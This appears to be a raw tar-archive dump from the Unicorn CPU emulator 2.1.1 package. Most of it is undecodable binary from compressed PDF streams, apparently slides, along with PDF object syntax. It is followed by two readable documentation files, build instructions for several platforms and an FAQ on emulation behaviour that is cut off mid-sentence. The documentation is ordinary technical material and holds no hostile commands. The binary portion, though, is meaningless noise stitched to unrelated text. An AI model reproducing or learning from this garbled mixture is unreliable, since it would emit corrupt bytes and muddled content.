͒"b"O|8P-wnhϪ_{Cְ@贩ޞ罷̀>BJm栟Zatt޸'4=[6pʖ.l50΁O˜y-8c9MoE%N5m cibiR@]Cv06C {H<)`dGWXVfõՑ*6]?I} oR+yH%N8I/*KTڼJqN_,˾�|VZ: &ѣ Wn,"�9O]\7o'ZE|I5{JhxE6hA]3 ds13Sq~vX|#`=QJ~#c>O¯ o>B@Q'ܱE1?{({oN&+ a}fsE/0&u5Ny(tK:##IYAX;=v{Ba|: H7<Wi$n8rxȊ;k9߸D`q"4xQ1}m49aD"r86.e(9%Bsk.mC5M#VLQ9\aҺ T ~k"- O?jZJ.αZֱmgضm۶͉m۶m'S{CW~zuhA܈J7ə F[5~%K7B _;K##X0qof1&ۡh 6hB12}PMb+wm GdwĦ6% v0l#a,Lە?VE$NQק̜Pҍڞ]� L҂{çv򵁃U7oK=p:%-@nQXVe$N\<)L(mv^aJK= t~r~dKu103bnc.46 rg�#k|�8�Y'JfH?ՄҀLCVނ%.]H;GM=i0 Fn,膗a>e!zL7 P.^11MMBRfYS>)-$bfJS9"մCn(Q �3$+mo^jퟹaTv@i䯋ltف ݑ'S-8UKpnq}y )TZ,feWN @+RQ8ߟ]4Aoq2^v4z Zp~975By3 g?5>En8*+~Q@Z[:GU/4ӷ1TF!/hT҉ĬsLWVq<[IxQXy:zg>?IO]!~Ta= ?rH27AR{_=K\&0.qI{gbZTb .gn=.B qXnтCӨ2A62)|8X%}'H4Dpb<vY>!F9b$jNJ-%<V_kUj&޿89ҬɊ~P)* a}zŷᎷ|~X*5lN*Te#)zYDqG1vD_EZ)`nHWKk0Q*r^ݾa^"$M 9.T@ D0z)VV;/qa!$ңBU"LƄyFM|}t9VMkSl]FMWgofȤn0~/EUO"en ?fTΡf?5:]5ίJh%!x7 Icr`PKB\;ܼm7ceBzzXM֨ hy$}BpO5<D)[N,_5o?0/mϋ?;2u;З8DahZ"yygdDQDISkOjv~!Ӡz!ek .]j(> Yϡ^,<ޜ>[ZMFjDQg>'~310d&UA>j�G9-N3[&MpHE<gN0Ijx3ݹ$VHc8Ĕ_3Z2XD2�<dQoƤRSAjɜ{oԆJ ;6Ew}3v%d+~n9ȘVJ=v28%r!q^fOwQ>wD=I,KzK_.=+D[j>RVU?4YD54 e̗W;E[{^P҈9"BA!.^uKzrVyS{ !^e</Om }׻)N3kŇi<>R 2t|?57/ʹ̑{ H<VȡAoڈGE*->we,4W3V*숶</9N^}w/Ìrwm`.!A_ij#ɱ1.us 2Hկbz<efL=zy/Isd' ^$K)%%?͛3˳9eL XWςߗgWIlCy`g/"#.J%wm#~R0Q{_^s~CƿT 2{|Q!5͠{$r%9%H];+ Ú| -VҪN~0 `!Y!m']K =QvxR::V w>Cg�e`!sx[vs Ľ{d�L rJo~`na5-efȌybL;2/; b~}<Q"Uӏc#Z.F6g'V}E-5HPH(دdBuxt�U{0qM2,MbtSe2|">6[.80Y3woLNlެ5%uwj" a3an2'CR0)0$69zS#sU>I$(v6`'V|^}#5Xd'\fl6WxDӥ7?g0eS3B*#E _΂" 芺 HbS!}Z HY>ަl:εɗ)eGglvV43kEjj >Y4pR8\:,Ga=MagJc^j<MCdiɝrǕk' 2%V#xeג/;aRIly v25,<9&rk1t uBF=+TZIh ˰~7P:j�Kgro (s_U@NȤP.VŁgf֓yNHXa2WULհwu/?:OeczԶN-+u! H[sMۧ u树~7�Yo8)VKMEQo;'e1ea){ણmi1<Me/ 똰%9g="3XyrFqU=I92cZbpqUQ;hW6vadwˏ_G HM#7h� P3N--nݠuxjl<Hc^�ƭ %CQߘiEЋM|DQ1mu%,y;"0!0$kCdHɿ^-Bg: mR'Z.(vS@&Kz e7̙yO|:DYXUGSW{&dSa0VW4; "[ј00$u 2Vh*SB8Ưub>y̫(f⨐{`?ld4#?ں.ꝡ D>V nG!Y/C1e;=.b.G[I!1Fz$_&tF6~@)^WI(~J1avg3]H\Gf wF}Jŝ[484De(Vh 7JltW}XkƼΰ [H<1:Rj,u-~ȁsH<]H'gƓ5PQ+9p']>K̞ZFYPg'|&(+HH]GjI<K*d)fQ !B"7K3'{)#|3M`8|_xrtW2fdl_̻<G#Pl2ȅ(\A9O5Z!]fy7n(]<�d_RDUyL0OmHo(1)%Z}Vw'(ǻ]`)f\٤>ZQR0wcc͈&ah?n=QTnNB_ ̨¤Ւv~ h~\ݲ\ڌ`b}.y Z\ge&C]Xlג(!2g}h>^#plCYv&[%ބc6*L~פ\^_^S=HsG3/j,RgY\\s4PyζS<%`7uyԏsDK/ ';D6|qĊPY)It5 52'>L3er4߈K`A? B3Np6 wMx* f쌐U 8[*Kpf/*.vjLܼNeymKZ`ve2yzٷBz c]oaiWt@ PAdwP&!',ۈ}#da r"fE8%Qu7sgDcԕR, FƜ(ZS#G1HuK 1wd)}MK-F7 d[vol(0!:&ޙ|X$[`c^h)/<O�:td S(SX/:+1 ՜Ի:yV \9f[N4m+^Prce]'PhUduS)BQK֕o{\ixCx@i]WysgjhO~k5pN1 p?-7R+a!'>[PXQy[V?}E}鍻Ώ(0TWW:z903OwI:&ɈzxQ~12>JG%'E Dx;(u`̿%Qߙz0Ql5Lj]/(#vQBT]V<u7'Yb~>kڐ%9%3u95Z 2/Ԝ,_bܳ W4k+F@&^Le%hrӦG[eÛ[ kErHJ < vK# ҭO3'\`iۛ,N/ Դ[w>29ؕSz"|k 87p8a1|eR=ZzA.rX*R%_P} l%˩@i͗ފuhWQJYk+7h~94R0mF>ǿ>cr89I6 XakfvRKOyBqP@=ȋsj}.-d� Upپ\<ͩ ElSB\i(L]sv0>-OTHQÀBI>1g5$&q+kXN;u 5hS)*<( jh/~zI@J:[ײ($+}f5@͈!DMũ~t#K,Yd4/ͱ++.0O(8ڍh}4YN'F^Sw(OKWXgb+?h'$CsdUW)[.]RNʒ#/�0"f-YV{eb qyįgf6lÆ^OWa<_ImΖ}dԖ(slF)0"ԑN9\OZAQ&(" }`ƫ0ojNnp�rr -㱥%*y)вz<k43YEƌk=Y^u1 Tt+0AđAa}3kO Vʰ<P< +4 =YҿTb&fL F LѼg`LŶv%{iӓE Nߊ 22YrS74>XE0*:]7Fi\R0"dȋB_ԯ"uI]XWQXx mHzd2 Q y)cRTWpS֏=즳C õnr ې5ҭ3}]!7Ae>7}n.᜙װw+g0eҢƨppWS]օRlvuצ zz&Xcm7q;B卤pQ< ى?q,_I]("l?FdBYØAT1|[E/:u8?#&ugs=?_sAPchJ<2fI՟mHj#?5}m v45 iax-61|L)z@A,]LjjPfja+VXVf {VCYP];V^aRE24.UlY n",Α?ح0֐iEE VW}7�3Ѭs$BAeu~?ω$̅ŇL*/RIoi"&Mc짣8 }k8 oR;vowu~+0oƿU- TOȵ3m0H**4o$G`Ɍy~k.mZù R2̤ppU8&S8.Jws6_GV;=`w9B#~Fꕗ sǥS &ka5 (W²v'b`>&+zj'Hb2u\W:lls_m[&{t,duK&шr9dq^{=9ȓA YN/jx<^o:R6g3~\Bu1m~lȆ? Q V#sIEP ^s dk:nb-j<@ T+3;7DY42pf�Qpt9Ӂq$|Oz1hޟÙ!F _֢ϗ[]4#ISK+|=vfxԄlݲj6GKT ISSeZ)5s8`)J&nZ fږs:d@7EcYB>;'Ƌu7V)!|cԾؕbUIP.c1Ri Iq;s(wISfW*Jve|" da^&WQT0bI xRS9�k3́"8~L`m��dJW [|Is߉t)K6$Wև\/,Wo:d{7/Ӑxvcfk7n2n%ˣ;&Z`s̞0jTb;vBK�jU53e1:Etm[)k#܏PZkRm~xs/'A5hWkj]/1M>,BרI{25J3<W&49qL>7M[F{XЦt] <F?WZěi`ފa7&{KęMѲ7O=R#3B]aޣ2BRnB5N%) Y;my<5Ҹ֬6ur>2>jyYmۧyjY(%>1J Pf.I [:KE$V(ˉGb#8 [4ISɛ*'/�̡1x ls #,qw tGՏE^!f7Lbt~R<xk DV?MJz ;31yet {% ?J&vVߖ8�Is.x-JBQ�=nx n)foW.`~6ssͺk&E56XfloYF2X+ilnE8';QJ\ObkIA8|O]@|!ʐ(tJ~zRlO1Dl j} .7lH>CoY^9cE dL;}%AwXR!]aR0,  ֤F2;m*`H":4JȂ^?11?]|*FGĒ*5H;BQ:AePW@f͎I*[/ 4TqjpP륎yoZ0 !(KG Fo, &'{+T)܎jEC!uɷB#ـzhW 1kqakAj+CNǜ:j. *%5?U$i)EV@۬Ɇ;%%59<FVܟ0PAz OJ[׫;0)k̾c?DS'�Tyi*L5ې<D{dAܲGw^++i.@<d퉯 ݰȉNT7)pI8͎2>FM* 'z|~J5WfnvVuܯXNeQ\ܗ1.үvuu[_}9OaI /(O]wR[R>̬TV5aBwG4i֎߬*Ec#DJ|% &S( `X[)r^3 vZIeSl6!>\X{6*C)+-1+ L3ߛjz.j_v!~IPz䮋]dP =>R6q{f�&WR8KV^^(lI#1卤<popjL a8ET3!ʊ¹n_+,ف42PEΡ b�￐6d7BѾv;x]/FZE7.k%)$We[atgx$ o,4XKڙAYVw|˲@+QMny΋dU5]Z׽[F&e5JGO<~mzݕ;`.W0ળ KyprڣQ>s6۳HKuffvPܼbʗYj Mӽ9J-%m(C3laܣ2@a=99փ»ij`.٭PS#:Q jhqYt)‚ݛ2+䊝q47eѣ0ŁQJʛ 7ye Bu┅}`Phj9851\VcuZǭeL|Ц <XLT6yxMK#Sp3E!MsY;hhJ7ϙCDćOg�<X1Ȃ>;p{8ů|I3NTD|Ad4.+98TLWL ^O^y~~2"u+ﴞFAc(,OFSǔ漓v85$H'tפ-be. (|HfhVC0ݑh}{w2GdsB) wquÕ@bAHYCyEO2C(X6fzY7�]X.J .<4䰭~Iސpr(2iHS[=|E_a)/dž 3d7k?{^(LҼʱuMU\,H_~ȭ pB4jVsv>`\fO>5-iHwi^1:cT1ZI;#Vqyb(%~AΩlؕTl Ș\Re6.*@zC; V9=" NNw|(O 7NfWZ(HCT*δ1.|>[0ω</Sc#R'`]_(àBnpT[nR66]7y4EAqS D*Сip.LI;4uYS^\T:OԤ̱H|{L*\PY z~'#l+>uTAgsn3jCfSD]J;M^ԝT)PM%oUgiNDU&Z`4hcxk U/yP#Ԏ8%Ps3:^ <KזW0,o}@KNr؅bWjb4i;㍉hx.z *HƓa)Yw?_7::@ny0\xe|CNp5c*ýݓ|}Uk4ue(,5 X%&Ͳ5.&hZS%##<y\rZĶRrEg&3B0=.xN0b[C7a6*B Tfj߼ƛJѱ%$3lH~~n#(gCp偮 ,!N$L%gMP2_q{=�8 zV/{\aw^˾oEtЄ�aFF荻UW.2$ry?pO.�v6E}Tj}{D+c^|�.-9^zZrlx>hٺKCZBH28/70/g@{\fW[#%x ȃݝ5:,1n_rj #ycvcǥ4`L~[J]ok{ L@nTd#U.?.`)]hFh�O,;msbե<\ʧ~pw^rSKꇠ?ՖC�CҜ ^ ZfM*ECKV,ӟs.?> M [X-"g>$t h?J</*6 VY ZI %㙵y͈c;S�cU8wv N̊sݕ,I%xO4L@�#< <jVg\kG<Gk}̜Pp.O!IH٪,rjX-TFbRpk޻jJxv`cbQl^B�]-!"o>�?5�you(� `kz|s'\Sy~xM:7z L_edmsv B~ݟ^ft8o Aiyv'`S%IE0O3xc,^h}HǖUzXğx=EX=ƥ'R,xZ<^4N?=P;&/ J>rW%2Uj|/H~ dRyfzt8L&a=+~\n36M~g퐄_8l | o["3jD$x~A*^)׭tM_F*Ji)Rǔys#½6>Suq溗 W%qe[<4 z .x+!#xj+Z 4NXD|mIЄ&};U6 ;mXzJ_}DYˈ"p<cF: O7xF4h:Y}B1c<ul\|kzIa\1 A% endstream endobj 308 0 obj << /Type /ObjStm /N 100 /First 900 /Length 4216 /Filter /FlateDecode >> stream x[isίI<o\J-GXvl$2 /szAH H{ġ<gadUJX"a&i|+&|;÷AG|kf-"Gӱ & F1$h]6B|Ř$&EMc#`lmZ-za س6ᱷ&,l&dL;&0=E#B&Ö>w#iq:ZSa6pKWX<ZD;,hsoS'du 9{##.t h.~^;$ Fxh>xjI ^3x GEv!`4Vy,cj"D/†$}D0ٹ/l/#g$#],bVIJ$K�DMH $Cc6$}SIΉz� SLC,d@dV6F3fgU)0 A&ϰ(LL0am.zkt xbT;F! ԉ@ouu Kj QA<x5d ZO30ee-ݻy_ "Wh+H'οP!wG۫aY;0ÃiwZё{Tܽ+LͰ=&5+ash1hkK3!T/ֽfSZ,=zTs|Q/q݁4i=NKG>'qpPa{oY%VHU ]+ sr dBwuF(k<\v6}ȃS~ՑFzLwgDw9VTe TUReuĘG/FIc;폆G mFzC+J\ �vƬ¨oQo d(=T,p`w>n6Tf6fڹ纴bh8U+Ee­ru+8kG֮ n1Pe˵5 Ws-BX`qc9 Ucv_/`mZ8Z895t.x]'8 00N&J|Vy7(#Tܽ;ȝJȗtz/)?}Txxu5݆y[yq(<dR4Zw#u=ObLRK.3|7=W"(;.)%%R#?Yk(ʑ'=pU'T&%&%|[*"KgUz<}A2UHFC}z~|2@3ДѩR/~cR;?u՟ޜ7W @qHO'37f7:xPWѩ<g_-TѣZ+4KUGH=5Λs0ȭ-Rؒqo_@֟j場(qɍO[TrxդU2ߑ~%pkUB\;7+UMVݔPqk$Mq)<ہ‚!ώ9~߫?z`C(G),i3LQ׶J"MA,r6Sh٥M-O�7haNp2O+-<4ѐ$&EzcCD.9)G.wei䏊dEUٍhPJ&J֔˖V p/MpAv%CpOUL3=PzP`3A#YX%$MV,Hvo{6VOTizH֑m5DU%yG6o#ɥ</A$z 2[mFƞپZs&^!A]� !mE.`-Qz ԦaA:E]fGtaNQ#!J)̥RaQ'fH#JL ]N|ݎn KJiS7kcPW -ZviSH ̑*8_[6OK O /P\zs0PFDC"#q ZTa'5{9ga3Bi\("oucMm2ŖB =E\3[ z͉bGس.<_L 'D 8᫚"S\fz'#)Jv♉UhCfw)4r6Sh٥MflSh<,3g{#f439wH͘Z8KxgCk =65x%ʽc^Zm_U^ܚ_| =ziC+pE"'+(FP!/(ml4kڹM xrO8>DBBZK֤iTZqaCCRL$ w7m)XvPx[5g:Y$V-7\ehY;T.iU4Qz },5GMɖrg3s>P[<u⌛jP6H\'bIJ# M*Ω˜4UZLj7'%`ZGxP*VsJЧަ.d1C΁r[췜P'pB \C:d CJ}h)"KMA߻11ͼcC*rֈXn\dh۱WۖAX~C /6בkffktRCY>3fw]]tS %T�)Kgd3(4w5G0neB.m &|`ى^Y메OÛ]ws6K|/*ƍb.mM{U*yubh:]cG/ِ+c9>/&Eo #3L9B gp ,@[+>n3}zBFOד޸6S'SzvvV1O+#s;&;ޢ֚\LzQ#wg?)%m;vǃ=8֧ yY&9Q;>Ώ>\YzwT_?yß<B$@/Y$BM[(O2΄R5ԽE1rro,JT202H()/+ELc94M4.6m_~`@uwm+-\B6m w䮼/=?ɗwFveOF+k ȣZXȾKaXˑXYNɉɸHO"u6'v_]+uyH5MK,@KV ?uYx{Oe~DYTP> x `G0cGA}4--v#$7 ~yJ W)I7JZ#+Vٺ-yԾE*]{+ZEvO;<AfN.pޠ{ `'_Ns}g +,]Cy68.-w=Ck6{첩6ꏟ=scTpהSTV}sS=_2֛ˍu>w-{_ 㺋V 8'M἞َv%;Qb;xb]s#g(\s2D+rM*q /ϥ`E rj6IO=zYQsW!&'QR;i\^`U}Y)68^ VpY2-kz`痧ׄ$t Dí 8}^/i:%\(R_.%4PO4:VbrCr \GH ÖKO:(׼x5thD?8%%5SQe2ї?<.I5P&3 Q�nxCgC6<N)^\C<OE~>2RDP%ᕜ9K0htȾDK4a*ZoP'q;E K .7|ɔ!(^?.^'K1̋NjSڜ﯍n1Ќ!1}cViY+,K޴8rhh?EUJy,d.d/dKm-mZ_dɯd)mJ+UEhn V+,^VZ]`I_ɒފV,Yҹq[ K5EV•Ax? endstream endobj 442 0 obj << /Author()/Title()/Subject()/Creator(LaTeX with Beamer class version 3.36)/Producer(pdfTeX-1.40.16)/Keywords() /CreationDate (D:20150807121123-07'00') /ModDate (D:20150807121123-07'00') /Trapped /False /PTEX.Fullbanner (This is pdfTeX, Version 3.14159265-2.6-1.40.16 (TeX Live 2015) kpathsea version 6.2.1) >> endobj 416 0 obj << /Type /ObjStm /N 43 /First 364 /Length 1585 /Filter /FlateDecode >> stream xڥXo6~_j@ k=M}p[5Ɓ;Pxwϒ!DӘ 73o h FcyD<xdt<Z&[Xh 48f1�`90qd:oՁ5<"e:ED<A [$ OADڈϜ[Hj=,,2}b"N&0='jP$-y0UbKsGL%4&l8=]sәobuy>J_N՛.~}O//_BHϺ1)={nxu3mXX|>|s#MJ=;woHaMCS*} z/VO yLP*|yoO|�?i$<}1𹖏:cPb@yTLDh $Ն~3>ہ!ms_y0jA!Dy>hG.zVI85|F,8\gdѫZ֥V 5}k|FՒqX9\u|ws,+wwq^OKȥtdq82*xkJ* L;2i,A={L~;A9)(wXvێ3A`+/;4Ln?]˖2m)W-a_bS}lzwXVb}e}lai%f.0'0r8֕I[|&lVkn_us\\D%[ƺa)1qXh*Q$\u\]Yeu+~c/:\( UXt!ʮTE(}b#֙"D !Uaa:Ugd/`Vjl|u~w%X4^M~9N?BSU+0sUCrB7Ini!}g.':>apk'8|BݸI5wX]Kܮz"??])2LoGTks2PFY${28cXq bO-k[q_FYzH2ە|5OLl^=ʈس+3$ԔGYZKU2妨햛;Z KΫ,6'Rc-WO-!N˝'%*T-wZ╬ϺX2XL^9 #HeqG*%Mi4*9aeJb}a^85&"6]mf6ȯ;:pj0巠4mZ~:jVK0NBA>N2Sj:-sXt}X_m,%}=,[ۿpnn)bڟ.n7<y}˳3H3̦K33fg!Ziyr#3JQ P$(P,0P48P<@PDHPLPPTXP\\T\\IZ%%%%%%%%%%%eꦻ>$܄m_ endstream endobj 443 0 obj << /Type /XRef /Index [0 444] /Size 444 /W [1 3 1] /Root 441 0 R /Info 442 0 R /ID [<DF62FB7DABFBDC9C248DE0B2927E4170> <DF62FB7DABFBDC9C248DE0B2927E4170>] /Length 1134 /Filter /FlateDecode >> stream x%oUUws{\ ( -Ph/e-c)C hbBI|qx>}PpD&JDCPc⃚ƿz~/|k9{B(悪v#PPJ ehV! G»׬r VlD=ИMow-;,f,,& Wfa ,<8JKŨ2{գ*%5s-$РWZ 9>D6l9f[k!W6&М-!d+*7xE-`hSw,+Uσ)6vH PxX :jЮ.tU #zԅ5 tu`=�zF >UxϳTff> ΰCTtM ^~vXexd5V[>xjv\|>w8aO?wn/\=FpIWc '<Nq; &ipLJ8.i [{PaKǽR" v�@p,OoxGm#VsC~GzՅ#ލ46J=Ϲ 0pĬJ}Z쐶qaEq]\+ #1gKf_dĉGsX4*E�*aد{nX**wgs,n�^;y`faGsElYfϺ(pZkqL3^�8,+/WqXP/b')9.Sa 0\d;9%uTy7( ל+QRgJ^u pX5QՂ[\Z` X?.,>T2Tɏ>,>@hUropfW%W] :Y ְ n& |u)yl[> 8 vW\YU#`/ 8۞o4;T&|jL/?XQ_7_ոj~:ڙVՄjjuJ&U0*)M+ J`ʝҲ ШW L[}K[JR_4*i'mE{R]\o,I endstream endobj startxref 766725 %%EOF �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/COMPILE.md�����������������������������������������������������������������������0000664�0000000�0000000�00000010276�14675241067�0015554�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������This HOWTO introduces how to build Unicorn2 natively on Linux/Mac/Windows or cross-build to Windows from Linux host. Note: By default, CMake will build both the shared and static libraries while only static libraries are built if unicorn is used as a Cmake subdirectory. In most cases, you don't need to care about which kind of library to build. ONLY use `BUILD_SHARED_LIBS=no`if you know what you are doing. ## Native build on Linux/macOS This builds Unicorn2 on Linux/macOS. Note that this also applies to Apple Silicon M1 users. - Install `cmake` and `pkg-config` with your favorite package manager: Ubuntu: ``` bash sudo apt install cmake pkg-config ``` macOS: ```bash brew install cmake pkg-config ``` - Build with the following commands. ```bash mkdir build; cd build cmake .. -DCMAKE_BUILD_TYPE=Release make ``` ## Native build on Windows, with MSVC This builds Unicorn2 on Windows, using Microsoft MSVC compiler. - Require `cmake` & `Microsoft Visual Studio` (>=16.8). - From Visual Studio Command Prompt, build with the following commands. ```bash mkdir build; cd build cmake .. -G "NMake Makefiles" -DCMAKE_BUILD_TYPE=Release nmake ``` Note, other generators like `Ninja` and `Visual Studio 16 2019` would also work. ```bash mkdir build; cd build cmake .. -G "Visual Studio 16 2019" -A "win32" -DCMAKE_BUILD_TYPE=Release msbuild unicorn.sln -p:Plaform=Win32 -p:Configuration=Release ``` ## Cross build with NDK To cross-build and run Unicorn2 on the Android platform, firstly you need to download [NDK](https://developer.android.com/ndk/downloads). For newer NDK, please make sure your cmake version is above 3.19. Then generate the project like: ```bash mkdir build; cd build; cmake .. -DCMAKE_TOOLCHAIN_FILE=$NDK/build/cmake/android.toolchain.cmake -DANDROID_ABI=$ABI -DANDROID_NATIVE_API_LEVEL=$MINSDKVERSION make ``` You may get the possible values from this [page](https://developer.android.com/ndk/guides/cmake). Unicorn2 support cross-build for `armeabi-v7a`, `arm64-v8a`, `x86` and `x86_64`. Note the build is only tested and guaranteed to work under Linux and macOS, however, other systems may still work. ## Cross build from Linux host to Windows, with Mingw This cross-builds Unicorn2 from **Linux host** to Windows, using `Mingw` compiler. - Install required package. ```bash sudo apt install mingw-w64-x86-64-dev ``` - Build Unicorn and samples with the following commands. ```bash mkdir build; cd build cmake .. -DCMAKE_TOOLCHAIN_FILE=../mingw64-w64.cmake make ``` ## Native build on Windows host, with MSYS2/Mingw This builds Unicorn2 on **Windows host**, using **MSYS2/Mingw** compiler. This requires MSYS2 to be installed on the Windows machine. You need to download & install MSYS2 from https://www.msys2.org. Then from MSYS2 console, install packages below: ```bash pacman -S mingw-w64-x86_64-toolchain mingw-w64-x86_64-cmake mingw-w64-x86_64-ninja ``` - Build Unicorn and samples with the following commands. ```bash export PATH=/mingw64/bin:$PATH mkdir build; cd build /mingw64/bin/cmake .. -G "Ninja" ninja -C . ``` Note that the way to build on MSYS changes as time goes, please keep in mind that always use the cmake shipped with mingw64. ## Cross build from Linux host to other architectures This cross-builds Unicorn2 from **Linux host** to other architectures, using a cross compiler. - Install cross compiler package. For example, cross-compile to ARM requires the below command. ```bash sudo apt install gcc-arm-linux-gnueabihf ``` - Build Unicorn and samples with the following commands. The compiler name differs according to your targets. ```bash mkdir build; cd build cmake .. -DCMAKE_C_COMPILER=gcc-arm-linux-gnueabihf make ``` ## Building from vcpkg The Unicorn port in vcpkg is kept up to date by Microsoft team members and community contributors. The url of vcpkg is: https://github.com/Microsoft/vcpkg . You can download and install unicorn using the vcpkg dependency manager: ```bash git clone https://github.com/Microsoft/vcpkg.git cd vcpkg ./bootstrap-vcpkg.sh # ./bootstrap-vcpkg.bat for Windows ./vcpkg integrate install ./vcpkg install unicorn ``` If the version is out of date, please [create an issue or pull request](https://github.com/Microsoft/vcpkg) on the vcpkg repository. ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/docs/FAQ.md���������������������������������������������������������������������������0000664�0000000�0000000�00000030215�14675241067�0015066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������## Why is my execution so slow? Typically, it’s due to - Instrumenting every instruction executed. - Instrumenting every memory access. Optimize your program with less instrumentation, e.g. by using `UC_HOOK_BLOCK` instead of `UC_HOOK_CODE` ## Why do I get a wrong PC after emulation stops? Updating PC is a very large overhead (10x slower in the worst case, see FAQ above) for emulation so the PC sync guarantee is explained below in several cases: - A `UC_HOOK_CODE` hook is installed. In this case, the PC is sync-ed _everywhere_ within the effective range of the hook. However, on some architectures, the PC might by sync-ed all the time if the hook is installed in any range. Note using `count` in `uc_emu_start` implies installing a `UC_HOOK_CODE` hook. - A `UC_HOOK_MEM_READ` or `UC_HOOK_MEM_WRITE` hook is installed. In this case, the PC is sync-ed exactly before any read/write events within the effective range of the hook. - Emulation (`uc_emu_start`) terminates without any exception. In this case, the PC will point to the next instruction. - No hook mentioned above is installed and emulation terminates with exceptions. In this case, the PC is sync-ed at the basic block boundary, in other words, the first instruction of the basic block where the exception happens. Below is an example: ``` mov x0, #1 <--- the PC will be here mov x1, #2 ldr x0, [x1] <--- exception here ``` If `ldr x0, [x1]` fails with memory exceptions, the PC will be left at the beginning of the basic block, in this case `mov x0, #1`. However, if a `UC_HOOK_MEM_READ` hook is installed, the PC will be sync-ed: ``` mov x0, #1 mov x1, #2 ldr x0, [x1] <--- exception here and PC sync-ed here ``` ## I get an “Unhandled CPU Exception”, why? Unicorn is a pure CPU emulator and usually it’s due to no handler registered for instructions like `syscall` and `SVC`. If you expect system emulation, you probably would like [qiling framework](https://github.com/qilingframework/qiling). ## I would like to instrument a specific instruction but get a `UC_ERR_HOOK`, why? Currently, only a small subset of the instructions can be instrumented. On x86, all available instructions are: `in` `out` `syscall` `sysenter` `cpuid`. ## Emulating some instructions gives an error like "Invalid Instruction", what should I do? 1. Some instructions are not enabled by default on some architectures. For example, you have to setup CSR on RISC-V or VFP on ARM before emulating floating-point instructions. Refer to the corresponding manual to check if you leave out possible switches in special registers. 2. Different CPU models support different sets of instructions. This is especially observed on ARM CPUs. For example, for `THUMB2` big-endian instructions, consider setting CPU model to `cortex-r5` or `arm_max`. See [#1725](https://github.com/unicorn-engine/unicorn/issues/1725) and [#1724](https://github.com/unicorn-engine/unicorn/issues/1724). 3. If you are on ARM, please check whether you are emulating a THUMB instruction. If so, please use `UC_MODE_THUMB` and make sure the starting address is odd. 4. If it's not the cases above, it might be some newer instruction sets that qemu5 doesn’t support. 5. Note some instruction sets are not implemented by the latest QEMU. If you are still using Unicorn1, please upgrade to Unicorn2 for better support. ## Memory hooks get called multiple times for a single instruction There are several possibilities, e.g.: - The instruction might access memory multiple times like `rep stos` in x86. - The address to access is bad-aligned and thus the MMU emulation will split the access into several aligned memory access. In worst cases on some arch, it leads to byte by byte access. ## I can't recover from unmapped read/write even I return `true` in the hook, why? This is a minor change in memory hooks behavior between Unicorn1 and Unicorn2. To gracefully recover from memory read/write error, you have to map the invalid memory before you return true. It is due to the fact that, if users return `true` without memory mapping set up correctly, we don't know what to do next. In Unicorn1, the behavior is __undefined__ in this case but in Unicorn2 we would like to force users to set up memory mapping in the hook to continue execution. See the [sample](https://github.com/unicorn-engine/unicorn/blob/c05fbb7e63aed0b60fc2888e08beceb17bce8ac4/samples/sample_x86.c#L1379-L1393) for details. ## My emulation gets weird read/write error and CPU exceptions. For MIPS, you might have an address that falls in MIPS `kseg` segments. In that case, MMU is bypassed and you have to make sure the corresponding physical memory is mapped. See [#217](https://github.com/unicorn-engine/unicorn/issues/217), [#1371](https://github.com/unicorn-engine/unicorn/issues/1371), [#1550](https://github.com/unicorn-engine/unicorn/issues/1371). For ARM, you might have an address that falls in some non-executable segments. For example, for m-class ARM cpu, some memory area is not executable according to [the ARM document](https://developer.arm.com/documentation/ddi0403/d/System-Level-Architecture/System-Address-Map/The-system-address-map?lang=en). ## KeyboardInterrupt is not raised during `uc.emu_start` This is intended as python [signal module](https://docs.python.org/3.10/library/signal.html) states: > A long-running calculation implemented purely in C (such as regular expression matching on a large body of text) may run uninterrupted for an arbitrary amount of time, regardless of any signals received. The Python signal handlers will be called when the calculation finishes. A workaround is to start emulation in another thread. ## Editing an instruction doesn't take effect/Hooks added during emulation are not called. Unicorn is a fork of QEMU and inherits most QEMU internal mechanisms, one of which is called TB chaining. In short, every block (in most cases, a `basic block`) is translated, executed and __cached__. Therefore, any operation on cached addresses won't immediately take effect without a call to `uc_ctl_remove_cache`. Check a more detailed discussion here: [#1561](https://github.com/unicorn-engine/unicorn/issues/1561) Note, this doesn't mean you have to care about Self Modifying Code because the read/write happens within emulation (TB execution) and QEMU would handle such special cases. For technical details, refer to the [QEMU paper](https://www.usenix.org/legacy/event/usenix05/tech/freenix/full_papers/bellard/bellard.pdf). TLDR: To ensure any modification to an address will take effect: 1. Call `uc_ctl_remove_cache` on the target address. 2. Call `uc_reg_write` to write current PC to the PC register, if the modification happens during emulation. It restarts emulation (but doesn't quit `uc_emu_start`) on current address to re-translate the block. ## How to emulate interrupts (or ticks) with Unicorn? As stated, Unicorn is a pure CPU emulator. For such emulation, you have two choices: - Use the `timeout` parameter of `uc_emu_start` - Use the `count` parameter of `uc_emu_start` After emulation stops, you may check anything you feel interested and resume emulation accordingly. Note that for cortex-m `exec_return`, Unicorn has a magic software exception with interrupt number 8. You may register a hook to handle that. ## Why not keep up the upstream qemu? To provide end users with simple API, Unicorn does lots of dirty hacks within qemu code which prevents it from sync painlessly. ## Is there anyway to disable softmmu to speed up execution? Yes, it’s possible but that is not Unicorn’s goal and there is no simple switch in qemu to disable softmmu. Starting from 2.0.2, Unicorn will emulate the MMU depending on the emulated architecture without further hacks. That said, Unicorn offers the full ability of the target MMU implementation. While this enables more possibilities of Uncorn, it has a few drawbacks: - As previous question points out already, some memory regions are not writable/executable. - You have to always check architecture-specific registers to confirm MMU status. - `uc_mem_map` will always deal with physical addresses while `uc_emu_start` accepts virtual addresses. Therefore, if you still prefer the previous `paddr = vaddr` simple mapping, we have a simple experimental MMU implementation that can be switched on by: `uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)`. With this mode, you could also add a `UC_HOOK_TLB_FILL` hook to manage the TLB. When a virtual address is not cached, the hook will be called. Besides, users are allowed to flush the tlb with `uc_ctl_flush_tlb`. In theory, `UC_TLB_VIRTUAL` will achieve better performance as it skips all MMU details, though not benchmarked. ## Something is wrong - I would like to dig deeper Unicorn uses at several places logging by the qemu implementation. This might provide a first glance what could be wrong. The logs contains optionally the filename and the line number including additional messages to indicate 